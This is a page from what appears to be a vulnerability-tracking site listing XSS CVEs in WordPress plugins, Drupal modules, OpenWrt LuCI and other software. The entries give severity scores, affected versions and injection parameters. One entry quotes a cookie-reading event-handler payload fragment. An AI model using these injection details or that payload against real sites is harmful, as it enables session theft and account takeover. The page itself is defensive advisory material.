Stored Cross-Site Scripting in the Breeze Cache WordPress plugin (versions before 2.5.6) allows unauthenticated attackers to inject arbitrary HTML attributes into cached page output by exploiting a predictable placeholder hash format used during HTML minification. The root cause is a weak, guessable replacement token generated during the minification pipeline combined with a flawed regular expression, meaning an attacker who can submit content to the site can anticipate the placeholder pattern and craft input that survives minification as injected markup. A publicly available proof-of-concept exploit exists; this vulnerability has not been confirmed in CISA KEV at time of analysis, but the low attack complexity and unauthenticated access requirement make it a realistic opportunistic target across WordPress deployments using this plugin.

XSS WordPress Breeze Cache
NVD WPScan
EPSS 0% CVSS 1.9
LOW POC Monitor

Stored cross-site scripting (XSS) in SourceCodester Online Book Store System 1.0 allows a high-privileged authenticated attacker to inject malicious script payloads via the Name or Username fields in the User Management Module, which then execute in the browsers of other users who view the affected page. A publicly available proof-of-concept exploit exists, documented in a Medium article specifically demonstrating authenticated stored XSS in this module. This is not confirmed in the CISA KEV catalog, and real-world impact is constrained by the niche, educational nature of the affected software and the requirement for administrative credentials to inject payloads.

XSS Online Book Store System
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

Stored XSS in Ragic Enterprise Cloud Database permits unauthenticated remote attackers to inject persistent JavaScript into application data, which then executes in the browsers of any user who loads the affected page. Because the payload is stored server-side, a single injection event affects all subsequent visitors without further attacker interaction. No active exploitation is confirmed in CISA KEV and no public proof-of-concept code has been identified at time of analysis, but the CVSS 4.0 PR:N rating confirms no authentication is needed to plant the payload.

XSS Enterprise Cloud Database
NVD VulDB
EPSS 0% CVSS 2.0
LOW Monitor

Cross-site scripting in vnotex vnote up to version 3.20.1 allows a remote attacker with low-level privileges to inject malicious scripts via the YAML frontmatter `p_metaData` argument processed by `/src/data/extra/web/js/markdownit.js`. When a victim views or renders a specially crafted note containing malicious YAML metadata, the injected script executes in their browser context, enabling limited integrity manipulation. No patch is available at time of analysis - the vendor did not respond to responsible disclosure contact - and exploit code is publicly referenced via VulDB.

XSS Vnote
NVD VulDB
EPSS 0% CVSS 9.4
CRITICAL Act Now

Stored cross-site scripting in OpenWrt's LuCI web interface lets an adjacent-network attacker inject executable HTML/JavaScript by supplying a malicious DHCPv6 Client FQDN hostname, which the DHCP lease status tables render without proper output encoding. When an administrator views the DHCP lease page, the payload executes in their authenticated browser session, enabling router admin-panel compromise. Rated CVSS 4.0 9.4 (Critical) by the vendor; no public exploit identified at time of analysis and it is not listed in CISA KEV.

XSS Luci
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH This Week

Stored cross-site scripting in OpenWrt's luci-app-upnp lets an unauthenticated LAN client persist a JavaScript payload that executes in the router administrator's browser. By supplying malicious HTML in the NewPortMappingDescription field of a UPnP IGD AddPortMapping SOAP request, an attacker gets miniupnpd to store the value and luci-app-upnp to render it unencoded on the UPnP and Status pages. No public exploit identified at time of analysis, and it is not listed in CISA KEV; the CVSS 4.0 base score is 8.7 (High).

XSS Luci
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM This Month

Cross-site scripting in Akpali9 Attendance-Management-System allows a remote, low-privileged attacker to inject malicious JavaScript via the export_date parameter in absent.php, executing in the browser context of any victim user who interacts with attacker-crafted content. All versions up to commit 70b91fe38f4195b701a45f0edcd4f42d5f64aeee are affected; the project's rolling release model means no discrete patched version exists, and the vendor did not respond to disclosure. No public exploit code has been identified and the vulnerability is not listed in CISA KEV at time of analysis.

XSS PHP Attendance Management System
NVD VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Cross-site scripting in igweze Wizgrade's dashboard/studentConductManager.php allows remote, unauthenticated attackers to inject and execute malicious scripts in a victim's browser upon interaction with a crafted request. The vulnerability was publicly disclosed with exploit code available (CVSS 4.0 E:P), and the vendor did not respond to pre-disclosure contact, leaving no official patch or remediation guidance. No active exploitation has been confirmed via CISA KEV, though the public exploit raises the risk of opportunistic targeting of school or academic institutions using this PHP-based student management system.

XSS PHP Wizgrade
NVD VulDB
EPSS 0% CVSS 2.1
LOW PATCH Monitor

Stored XSS execution in Parse Server (versions 9.0.0 through pre-9.10.0-alpha.2 and all 8.x releases through 8.6.83) allows authenticated users with file-upload permissions to inject persistent JavaScript that executes in the application's origin against other users, but only when a cloud-based storage adapter is configured. By crafting a deliberately malformed Content-Type header - such as 'image' or 'image/' - an attacker exploits a gap in the mime-package lookup path that renders the fileUpload.fileExtensions blocklist ineffective, causing the malformed value to be stored verbatim in Amazon S3, Google Cloud Storage, or Azure Blob Storage. Browsers receiving a syntactically invalid Content-Type fall back to MIME sniffing and render HTML file bodies as web pages in the application's origin; no public exploit has been identified and the vulnerability is absent from CISA KEV, but the stored nature means a single successful upload persists as a live threat until patched or the file is removed.

XSS Google Microsoft +2
NVD GitHub VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the bbp Style Pack WordPress plugin (versions up to and including 6.4.5) allows authenticated attackers with Subscriber-level access and bbPress topic-creation privileges to permanently inject arbitrary JavaScript into forum topic pages via the Topic Form Additional Fields feature, with payload execution affecting all subsequent visitors including unauthenticated users. The flaw is a paired failure: unsanitized POST data written to post meta in bsp_topic_fields_form_save(), then rendered into raw HTML in bsp_topic_content_append_topic_fields() without output escaping. No public exploit has been identified at time of analysis, though Wordfence has confirmed the vulnerability with function-level detail and an upstream patch commit (changeset 3601461) exists.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting in the CorvusPay WooCommerce Payment Gateway plugin for WordPress (all versions through 2.7.4) lets unauthenticated attackers persist arbitrary JavaScript through the 'approval_code' parameter. The plugin exposes the REST route POST /wp-json/corvuspay/success/ with permission_callback set to __return_true, and its signature check only logs failures instead of blocking execution, so an attacker with any bogus signature can write a malicious approval_code into the order record, which then executes when a store operator or user views the affected page. Reported by Wordfence; no public exploit identified at time of analysis and no EPSS or KEV data provided.

WordPress XSS Corvuspay Woocommerce Payment Gateway
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored XSS in WCFM Marketplace - Multivendor Marketplace for WooCommerce (all versions ≤ 3.7.3) permits authenticated attackers holding a Vendor-level account to plant persistent JavaScript payloads inside WordPress media attachment titles, targeting any privileged user who subsequently loads the media management dashboard. The injection path is notable for its stealth: the attacker uploads a media file with a crafted post_title via the standard WordPress REST API (/wp-json/wp/v2/media), bypassing any AJAX-based access controls, because the unescaped title is later serialized into DataTables JSON and written directly to the DOM via innerHTML on the admin media interface. No public exploit code is identified and the vulnerability has no CISA KEV listing at time of analysis, but the low privilege barrier - any marketplace vendor account - meaningfully elevates real-world risk in multi-vendor deployments with untrusted sellers.

WordPress XSS Wcfm Marketplace Multivendor Marketplace For Woocommerce
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored Cross-Site Scripting in the Widgets for Google Reviews WordPress plugin (versions ≤ 13.3) enables authenticated attackers holding editor-level WordPress roles to inject persistent JavaScript through admin settings, which then executes in any site visitor's browser on pages rendering the compromised widget. Exploitation is gated by two environmental prerequisites - multi-site WordPress deployments or single-site installs where unfiltered_html has been explicitly disabled - substantially narrowing the attack surface despite the network-accessible entry point. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis; the fix is referenced via a WordPress plugin repository changeset but an exact patched release version is not independently confirmed.

WordPress XSS Google +1
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Fresh Podcaster WordPress plugin (all versions through 1.0.7) allows authenticated attackers holding at minimum contributor-level roles to inject persistent JavaScript payloads via unsanitized attributes of the 'freshpodcaster' shortcode. The injected script executes automatically in any visitor's browser upon loading an affected page, enabling session hijacking, credential theft, or unauthorized actions on behalf of higher-privileged users. No public exploit code and no CISA KEV listing have been identified at time of analysis, but the Changed scope in the CVSS vector underscores that impact crosses the plugin boundary into victims' browser sessions.

WordPress XSS Fresh Podcaster
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored Cross-Site Scripting in the White Label CMS WordPress plugin (versions through 2.7.12) permits authenticated administrators to persist arbitrary JavaScript payloads via plugin settings pages, which then execute in the browsers of other users who access affected pages. Exploitation is gated behind two hard constraints: the attacker must hold administrator-level WordPress credentials, and the target site must be either a WordPress multisite installation or a site where the unfiltered_html capability has been explicitly disabled. No public exploit has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog.

WordPress XSS White Label Cms
NVD VulDB
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting in the Form Vibes - Database Manager for Forms WordPress plugin (all versions through 1.5.2) lets unauthenticated attackers persist malicious JavaScript by submitting a crafted Contact Form 7 field, which the plugin stores and later renders unescaped in the WordPress admin entries view. Because sanitization and output escaping are both insufficient, the injected script executes in the browser of any user (typically a logged-in administrator) who opens the captured submissions. No public exploit is identified at time of analysis and it is not listed in CISA KEV, but the unauthenticated, no-privilege injection vector combined with scope-changing impact makes it a practical account-takeover risk for exposed sites.

WordPress XSS Form Vibes Save Contact Form 7 Elementor Form Entries To Database
NVD
EPSS 0% CVSS 4.9
MEDIUM This Month

Stored XSS in Premium Addons for Elementor (all versions ≤4.11.84) lets authenticated contributors plant persistent JavaScript payloads via the `premium_tooltip_text` parameter that execute specifically when an administrator opens the injected post in the Elementor editor - not on public-facing pages. The root cause is unescaped output in the `print_template()` method registered on the `elementor/section/print_template` hook, meaning the attack surface is confined to the Elementor editor backend. No public exploit or CISA KEV listing has been identified at time of analysis; however, the scope-changed CVSS rating reflects real privilege-escalation potential from contributor to admin session context.

WordPress XSS Premium Addons For Elementor Powerful Elementor Templates Widgets
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Themify Builder WordPress plugin (all versions through 7.7.6) enables authenticated attackers holding contributor-level access or higher to persist arbitrary JavaScript via the Map Module's `b_width_map` field. Because the scope changes (S:C in CVSS), the injected payload executes inside every subsequent visitor's browser context - enabling session hijacking, credential theft, or administrative account takeover against any user who views an affected page. No public exploit code has been identified and this vulnerability is not listed in CISA KEV, but the low exploitation complexity and network-accessible attack surface make it a meaningful risk on sites with open or broad contributor registration.

WordPress XSS Themify Builder
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Starboard Suite Reservation Calendars WordPress plugin (all versions through 3.1.4) allows authenticated attackers with Contributor-level access to inject persistent malicious JavaScript via unescaped shortcode attributes in the [starboard-suite-lightbox] shortcode. Any site visitor who loads a page containing the injected shortcode will execute the attacker's script in their browser, enabling session hijacking, credential theft, or malicious redirects against potentially higher-privileged users such as site administrators. No public exploit code or CISA KEV listing has been identified at time of analysis, but the low privilege bar (Contributor) and scope change to victim browsers make this a meaningful risk on multi-author WordPress sites.

WordPress XSS Starboard Suite Reservation Calendars
NVD VulDB
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored Cross-Site Scripting in the Print, PDF, Email by PrintFriendly WordPress plugin (versions through 5.5.10) allows authenticated administrators to inject persistent JavaScript via the 'content_position_css' parameter, which executes in the browsers of any user who visits an affected page. The scope change (S:C) in the CVSS vector confirms the injected script breaks out of the plugin's security context into victim browsers, enabling session hijacking, credential theft, or malicious redirects against site visitors. No public exploit code has been identified at time of analysis, and the vulnerability has not been added to the CISA KEV catalog.

WordPress XSS Print Pdf Email By Printfriendly
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored XSS in the Themify Builder WordPress plugin (all versions through 7.7.6) allows contributor-level authenticated users to inject persistent JavaScript via the 'height_slider' Slider Module field, which executes in the browser of any visitor who loads an injected page. The scope change (S:C in CVSS) captures the cross-context impact: attacker payload runs in victims' sessions, enabling session hijacking, credential theft, or unauthorized admin actions. No active exploitation is confirmed in CISA KEV, but a patch commit (changeset 3601964) is visible in the WordPress plugin SVN repository, suggesting a fix has been committed beyond version 7.7.6.

WordPress XSS Themify Builder
NVD
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting in the StyleMix Motors - Car Dealership & Classified Listings plugin for WordPress (all versions through 1.4.112) lets unauthenticated attackers persist malicious JavaScript through the Comment Content and User Biographical Info fields, which then executes in the browser of any visitor or administrator who views the affected page. The scope-changed CVSS 3.1 score of 7.2 reflects that injected script runs in a security context different from the vulnerable component. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the unauthenticated injection path makes it broadly abusable against sites running this popular automotive/classifieds plugin.

WordPress XSS Motors Car Dealership Classified Listings Plugin
NVD
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored Cross-Site Scripting in the Lockme OAuth2 Calendars Integration WordPress plugin (all versions through 2.11.0) permits authenticated administrators to persist arbitrary JavaScript in four settings fields - App ID, App Secret, Bookings ID prefix, and API domain - which then executes in the browser of any user who loads the plugin settings page. The root cause is a missing sanitize callback in register_setting() (Plugin.php:197) paired with unescaped output via direct echo into an HTML value attribute without esc_attr() (lines 212, 223, 245, 256), a classic CWE-79 dual-failure pattern. Exploitation risk is highest in WordPress multisite environments where per-site administrators, who should not have cross-site authority, could poison settings to harvest session tokens or perform actions in the context of super-administrators. No public exploit code and no CISA KEV listing have been identified at time of analysis; an upstream patch changeset (revision 3495564) has been committed to the WordPress plugin repository.

WordPress XSS Lockme Calendars Integration
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored XSS in the SimpLy Gallery Block & Lightbox WordPress plugin (all versions through 3.3.3.2) allows authenticated attackers with Author-level access to inject persistent JavaScript via the sliderMaxHeight block attribute. The root cause is a defective regex in pgc_sgb_sanitize_custom_css() that strips quoted event handlers but silently permits unquoted HTML event handler syntax (e.g., onfocus=alert(document.cookie)), enabling a sanitization bypass that survives to page render. No public exploit or CISA KEV listing is identified at time of analysis, though the stored nature means injected payloads persist and execute against any subsequent visitor - including administrators.

WordPress XSS Simply Gallery
NVD
EPSS 0% CVSS 9.8
CRITICAL Act Now

Stored/reflected cross-site scripting (CWE-79) affects the Drupal contributed module 'Mother May I' across all released versions (*.*), letting attackers inject script that executes in the browser context of other Drupal users. Because the module is a Drupal add-on rather than core, exposure is limited to sites that have installed it, and no public exploit has been identified. EPSS is low (0.15%, 5th percentile) and the flaw is not on the CISA KEV list, indicating no known active exploitation despite the vendor-assigned 9.8 rating.

XSS Mother May I
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Cross-site scripting (XSS) in Drupal Core affects a broad swath of the 10.x and 11.x release lines, enabling an authenticated low-privileged attacker to inject malicious client-side script that executes in the browser of a victim who interacts with the crafted content. The CVSS scope-change indicator (S:C) confirms the impact escapes the originating component into the victim's browser context, enabling session hijacking or privilege escalation against higher-privileged users. No public exploit code has been identified and EPSS sits at 0.15% (5th percentile), indicating low automated exploitation probability at time of analysis, though the wide deployment footprint of Drupal still makes patching urgent.

XSS Drupal Core
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored Cross-Site Scripting in the Drupal AI SEO/GEO Analyzer contrib module (versions 0.0.0 through pre-1.1.3) enables authenticated low-privilege users to persist malicious JavaScript payloads that execute in the browser context of other users - including administrators - who subsequently view the affected content. The scope change (S:C in the CVSS vector) confirms cross-context execution, enabling session hijacking, credential theft, or unauthorized DOM manipulation against victim users. EPSS probability stands at 0.25% (17th percentile) and no active exploitation has been reported in CISA KEV, indicating limited real-world threat at this time. A vendor-released patch is available via the Drupal security advisory SA-contrib-2026-076.

XSS Ai Seo Geo Analyzer
NVD
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored XSS in the Drupal UI Patterns (SDC in Drupal UI) contributed module allows a low-privileged authenticated attacker to inject persistent malicious scripts into web pages, which execute in the browsers of other users - including administrators - who view the affected content. Versions 2.0.0 through 2.0.17 of the module are affected, with a patch available from the Drupal security team. No public exploit identified at time of analysis, and the EPSS score of 0.25% (17th percentile) signals minimal observed exploitation pressure, though the stored nature of the XSS and potential to target privileged users elevates practical risk for sites using this module.

XSS Ui Patterns Sdc In Drupal Ui
NVD
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Cross-site scripting in Drupal's Siteimprove Analytics contributed module (all versions before 2.0.1) allows an authenticated low-privileged attacker to inject malicious scripts that execute in a victim user's browser session. The CVSS scope change (S:C) indicates the attack crosses the application trust boundary, enabling potential session hijacking or privilege escalation against higher-privileged users such as administrators who view attacker-controlled content. No public exploit code exists and EPSS of 0.19% (8th percentile) confirms low real-world exploitation probability; no active exploitation has been identified at time of analysis.

XSS Siteimprove Analytics
NVD
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Cross-site scripting in the Drupal Colorbox module allows an authenticated low-privileged attacker to inject malicious scripts that execute in the browser context of other users. The CVSS scope-change indicator (S:C) confirms this is likely stored XSS, where crafted input persists and executes when victims visit affected pages. No active exploitation is confirmed - EPSS sits at 0.20% (10th percentile) and the vulnerability is not listed in the CISA KEV catalog - but a vendor patch is available via Drupal security advisory SA-CONTRIB-2026-069.

XSS Colorbox
NVD
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting in the Drupal Canvas contributed module enables remote attackers to inject and execute malicious scripts in the browsers of Drupal site visitors. Affecting multiple version branches - 0.0.0 through 1.4.2, 1.5.0 through 1.5.2, 1.6.0 through 1.6.1, and 1.7.0 through 1.7.1 - the flaw (CWE-79) stems from insufficient sanitization of user-supplied input before rendering it in generated web pages. No public exploit code has been identified and this vulnerability is not listed in the CISA KEV catalog; the EPSS score of 0.20% (10th percentile) reflects minimal current exploitation activity.

XSS Drupal Canvas
NVD
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting in the Drupal Canvas contributed module allows unauthenticated remote attackers to inject and execute malicious scripts in victims' browsers across multiple version branches (0.0.0-1.4.2, 1.5.0-1.5.2, 1.6.0-1.6.1, 1.7.0-1.7.1). The scope-changed CVSS vector (S:C) confirms the attack escapes the server context and executes within the victim's browser environment, enabling session theft, credential harvesting, or unauthorized actions on behalf of the victim. No public exploit or CISA KEV listing has been identified, and EPSS at 0.20% (10th percentile) reflects minimal observed exploitation activity at time of analysis.

XSS Drupal Canvas
NVD
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting in the Drupal AI (Artificial Intelligence) contributed module exposes sites to session hijacking and malicious content injection when users interact with unsanitized AI-generated or AI-related output rendered in the browser. The module fails to properly neutralize user-controlled or AI-sourced input before including it in generated web pages, allowing an unauthenticated remote attacker to craft a payload that executes in a victim's browser upon interaction. No active exploitation is confirmed (not in CISA KEV) and EPSS is very low at 0.16% (6th percentile), though the network-accessible, no-privilege attack surface warrants prompt patching on internet-facing Drupal deployments.

XSS Ai Artificial Intelligence
NVD
Prev Page 2 of 432 Next

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
38813

Related CWEs

MITRE ATT&CK

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy